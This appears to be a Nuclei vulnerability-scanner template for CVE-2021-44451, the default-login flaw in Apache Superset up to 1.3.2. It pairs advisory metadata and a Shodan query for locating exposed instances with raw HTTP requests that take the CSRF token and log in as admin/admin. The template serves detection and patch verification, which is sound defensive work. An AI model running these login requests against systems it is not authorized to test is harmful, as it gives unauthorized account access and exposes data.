id: CVE-2021-44451 info: name: Apache Superset <=1.3.2 - Default Login author: dhiyaneshDK severity: medium description: | Apache Superset through 1.3.2 contains a default login vulnerability via registered database connections for authenticated users. An attacker can obtain access to user accounts and thereby obtain sensitive information, modify data, and/or execute unauthorized operations. remediation: Upgrade to Apache Superset 1.4.0 or higher. reference: - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/apache-superset-default-credentials.json - https://lists.apache.org/thread/xww1pccs2ckb5506wrf1v4lmxg198vkb - https://nvd.nist.gov/vuln/detail/CVE-2021-44451 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2021-44451 cwe-id: CWE-522 epss-score: 0.00614 epss-percentile: 0.76308 cpe: cpe:2.3:a:apache:superset:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: apache product: superset shodan-query: http.favicon.hash:1582430156 tags: cve,cve2021,apache,superset,default-login http: - raw: - | GET /login/ HTTP/1.1 Host: {{Hostname}} - | POST /login/ HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded csrf_token={{csrf_token}}&username={{username}}&password={{password}} - | GET /dashboard/list/ HTTP/1.1 Host: {{Hostname}} payloads: username: - admin password: - admin attack: pitchfork cookie-reuse: true req-condition: true matchers-condition: and matchers: - type: word part: header_2 words: - 'session' - type: word part: body_3 words: - 'DashboardFilterStateRestApi' extractors: - type: regex name: csrf_token group: 1 regex: - 'name="csrf_token" type="hidden" value="(.*)"' internal: true part: body # digest: 4a0a0047304502210083b1d94bba763ef6df42ac2793dbc5d790d31a1391bea1fa67cd8257cb526507022066a74471af77d627d6e3ce247d6f996f51f80c8cd5f6978b13171ceb619abe42:922c64590222798bb761d5b6d8e72950